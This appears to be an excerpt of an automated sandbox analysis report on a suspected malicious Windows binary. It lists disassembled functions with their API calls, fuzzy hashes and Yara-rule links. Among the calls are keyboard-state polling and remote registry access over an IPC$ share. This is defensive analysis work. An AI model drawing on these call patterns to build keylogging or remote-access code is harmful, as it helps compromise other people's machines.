                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 641708696-0
                                                                                                                                                                                                                                                                  • Opcode ID: c063c7804c5d00a54e3c55bc74c461ff6158560b948b39ac6ee8ebed7f7075a8
                                                                                                                                                                                                                                                                  • Instruction ID: b33ab44023c58782b8319b741dfc77da94c7279f71be293ea899c3b0aa965a6c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c063c7804c5d00a54e3c55bc74c461ff6158560b948b39ac6ee8ebed7f7075a8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9619D31501751EFDB368F16D848B3A77B1FF90316F185118E89B86AA0C330A9A0DF60
                                                                                                                                                                                                                                                                  Function 00CE2128 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE2234: GetWindowLongW.USER32(?,000000EB), ref: 00CE2242
                                                                                                                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00CE2152
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ColorLongWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 259745315-0
                                                                                                                                                                                                                                                                  • Opcode ID: 947f6013d14f4f30d502c0e77b946a50a6f04ea3f3666d8169bc3514fd8259f3
                                                                                                                                                                                                                                                                  • Instruction ID: 9441b6a2f7d08a1e5b0deb7bf4340d88f9535c66e24d2c17c0c9822ed040f60f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 947f6013d14f4f30d502c0e77b946a50a6f04ea3f3666d8169bc3514fd8259f3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F441BE31100790EFDB245F299C48BBD377AAB52325F584245EAB68B2E1D7318E82DB20
                                                                                                                                                                                                                                                                  Function 00D4A05C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00D30D31,00000001,0000138C,00000001,00000000,00000001,?,00D5EEAE,00DB2430), ref: 00D4A091
                                                                                                                                                                                                                                                                  • LoadStringW.USER32(00000000,?,00D30D31,00000001), ref: 00D4A09A
                                                                                                                                                                                                                                                                    • Part of subcall function 00CEB329: _wcslen.LIBCMT ref: 00CEB333
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00D30D31,00000001,0000138C,00000001,00000000,00000001,?,00D5EEAE,00DB2430,?), ref: 00D4A0BC
                                                                                                                                                                                                                                                                  • LoadStringW.USER32(00000000,?,00D30D31,00000001), ref: 00D4A0BF
                                                                                                                                                                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00D4A1E0
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                                                                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                                                  • API String ID: 747408836-2268648507
                                                                                                                                                                                                                                                                  • Opcode ID: 85f3864aa8da54ff9d9390a181546f62feadfbe1d06c6934fc56889a526aefab
                                                                                                                                                                                                                                                                  • Instruction ID: 677e70838600da6c63b7dac3ec702b19eb60910751f757113ce5966937af9ebb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85f3864aa8da54ff9d9390a181546f62feadfbe1d06c6934fc56889a526aefab
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24415A72800249ABCB05EBE5DD86DEFB778EF18340F500165B505B20A2EB756F49EBB1
                                                                                                                                                                                                                                                                  Function 00D40FCF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE8577: _wcslen.LIBCMT ref: 00CE858A
                                                                                                                                                                                                                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00D41093
                                                                                                                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00D410AF
                                                                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00D410CB
                                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00D410F5
                                                                                                                                                                                                                                                                  • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00D4111D
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00D41128
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00D4112D
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                                                                                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                                  • API String ID: 323675364-22481851
                                                                                                                                                                                                                                                                  • Opcode ID: 6f3a328bb8b148eb3101bc7d65544e26e9ff5410f13681dc2510c9962ae5981d
                                                                                                                                                                                                                                                                  • Instruction ID: 3572bb0da679b1080cc7fe515b91e59874c25e3d457827f0fe6a51df4390f367
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f3a328bb8b148eb3101bc7d65544e26e9ff5410f13681dc2510c9962ae5981d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C410676C10269ABCF11EBA4DC85DEEB778FF18750F044129E905A32A0EB319E48DB60
                                                                                                                                                                                                                                                                  Function 00D74A34 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00D74AD9
                                                                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00D74AE0
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00D74AF3
                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00D74AFB
                                                                                                                                                                                                                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00D74B06
                                                                                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00D74B10
                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00D74B1A
                                                                                                                                                                                                                                                                  • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00D74B30
                                                                                                                                                                                                                                                                  • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00D74B3C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                                                                                  • String ID: static
                                                                                                                                                                                                                                                                  • API String ID: 2559357485-2160076837
                                                                                                                                                                                                                                                                  • Opcode ID: 8feb52b19b2f0f250fb05dae2ac2eba89174d920ad22ba8da45bd9e1f7d0aef5
                                                                                                                                                                                                                                                                  • Instruction ID: e5d39136e731c84e35167b0b670b735ed6e57b55725fc307ac0ffe6dea6f8da4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8feb52b19b2f0f250fb05dae2ac2eba89174d920ad22ba8da45bd9e1f7d0aef5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9314B32140219ABDF129F64DC09FDA3BAAFF09324F154211FA19E61A0E735D850DBB4
                                                                                                                                                                                                                                                                  Function 00D6468D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00D646B9
                                                                                                                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00D646E7
                                                                                                                                                                                                                                                                  • CoUninitialize.OLE32 ref: 00D646F1
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D6478A
                                                                                                                                                                                                                                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00D6480E
                                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00D64932
                                                                                                                                                                                                                                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00D6496B
                                                                                                                                                                                                                                                                  • CoGetObject.OLE32(?,00000000,00D80B64,?), ref: 00D6498A
                                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00D6499D
                                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00D64A21
                                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00D64A35
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 429561992-0
                                                                                                                                                                                                                                                                  • Opcode ID: dba2c69569d46d19716445c710e18005a1d2c2bf8e6a5df1b74a20dff426117d
                                                                                                                                                                                                                                                                  • Instruction ID: 6bacffeb72cfdef8ab22be9462b795b66a0b984d8591c5a4ef96884f8a301ece
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dba2c69569d46d19716445c710e18005a1d2c2bf8e6a5df1b74a20dff426117d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DAC13371608301AFC700DF68C88492BBBE9FF89748F14491DF98A9B210DB30ED45CBA2
                                                                                                                                                                                                                                                                  Function 00D584DB Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00D58538
                                                                                                                                                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00D585D4
                                                                                                                                                                                                                                                                  • SHGetDesktopFolder.SHELL32(?), ref: 00D585E8
                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(00D80CD4,00000000,00000001,00DA7E8C,?), ref: 00D58634
                                                                                                                                                                                                                                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00D586B9
                                                                                                                                                                                                                                                                  • CoTaskMemFree.OLE32(?,?), ref: 00D58711
                                                                                                                                                                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00D5879C
                                                                                                                                                                                                                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00D587BF
                                                                                                                                                                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00D587C6
                                                                                                                                                                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00D5881B
                                                                                                                                                                                                                                                                  • CoUninitialize.OLE32 ref: 00D58821
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2762341140-0
                                                                                                                                                                                                                                                                  • Opcode ID: 012738d3408dee30bf0d559db9686eaf9ca2adfb373c7794d11a7299e8cc55ff
                                                                                                                                                                                                                                                                  • Instruction ID: de39eab25ddbe1c7e627a1f4235ddb97a6fc20c2d08cbbdd50aeac0f5f4974e3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 012738d3408dee30bf0d559db9686eaf9ca2adfb373c7794d11a7299e8cc55ff
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3C10C75A00205AFCB14DFA5C884DAEBBF5FF48345B148499E81AEB361DB30ED45DBA0
                                                                                                                                                                                                                                                                  Function 00D40378 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00D4039F
                                                                                                                                                                                                                                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 00D403F8
                                                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00D4040A
                                                                                                                                                                                                                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00D4042A
                                                                                                                                                                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00D4047D
                                                                                                                                                                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00D40491
                                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00D404A6
                                                                                                                                                                                                                                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 00D404B3
                                                                                                                                                                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00D404BC
                                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00D404CE
                                                                                                                                                                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00D404D9
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2706829360-0
                                                                                                                                                                                                                                                                  • Opcode ID: fb82109768910dc25a4c43bf48a983ef3e556ac703816a96dacb1fef40b8ef85
                                                                                                                                                                                                                                                                  • Instruction ID: 79fe929e8fce447b3498363edaa4b5d5e7bf1c6b6bcddae103f22dd728b3efa4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fb82109768910dc25a4c43bf48a983ef3e556ac703816a96dacb1fef40b8ef85
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74415035A002199FCB10DFA4D8489AE7FB9EF48354F008469EA59E7361D734A945CBB0
                                                                                                                                                                                                                                                                  Function 00D4A635 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetKeyboardState.USER32(?), ref: 00D4A65D
                                                                                                                                                                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00D4A6DE
                                                                                                                                                                                                                                                                  • GetKeyState.USER32(000000A0), ref: 00D4A6F9
                                                                                                                                                                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00D4A713
                                                                                                                                                                                                                                                                  • GetKeyState.USER32(000000A1), ref: 00D4A728
                                                                                                                                                                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00D4A740
                                                                                                                                                                                                                                                                  • GetKeyState.USER32(00000011), ref: 00D4A752
                                                                                                                                                                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00D4A76A
                                                                                                                                                                                                                                                                  • GetKeyState.USER32(00000012), ref: 00D4A77C
                                                                                                                                                                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00D4A794
                                                                                                                                                                                                                                                                  • GetKeyState.USER32(0000005B), ref: 00D4A7A6
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 541375521-0
                                                                                                                                                                                                                                                                  • Opcode ID: 5edbffc6ee0674c517554738233eb6df2395717dc05561de6d900df22940bb74
                                                                                                                                                                                                                                                                  • Instruction ID: a74e6af5a256f461a0db0f6cedde8ed41872adfe02ecbfdc955437d98626981b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5edbffc6ee0674c517554738233eb6df2395717dc05561de6d900df22940bb74
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 38419464584BC96BFF31976888043A5BEB16F12348F0C805AD5C65A6C2EB949DC8C7B3
                                                                                                                                                                                                                                                                  Function 00D69730 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcslen$BuffCharLower
                                                                                                                                                                                                                                                                  • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                                                                  • API String ID: 707087890-567219261
                                                                                                                                                                                                                                                                  • Opcode ID: f7fe22e81483056a61343d36f864b27cf97f139d8ca9ec5a9e9b251528a04481
                                                                                                                                                                                                                                                                  • Instruction ID: 0650f01ed4aa28b2e1e78cad4139827d08ff95f0a2e27360e0ea603c5b479094
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f7fe22e81483056a61343d36f864b27cf97f139d8ca9ec5a9e9b251528a04481
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3251D531A001169BCB14DF69C9609BEF3B9BF65360B24422AF866E7384DB31DE41D7B0
                                                                                                                                                                                                                                                                  Function 00D64189 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CoInitialize.OLE32 ref: 00D641D1
                                                                                                                                                                                                                                                                  • CoUninitialize.OLE32 ref: 00D641DC
                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(?,00000000,00000017,00D80B44,?), ref: 00D64236
                                                                                                                                                                                                                                                                  • IIDFromString.OLE32(?,?), ref: 00D642A9
                                                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00D64341
                                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00D64393
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
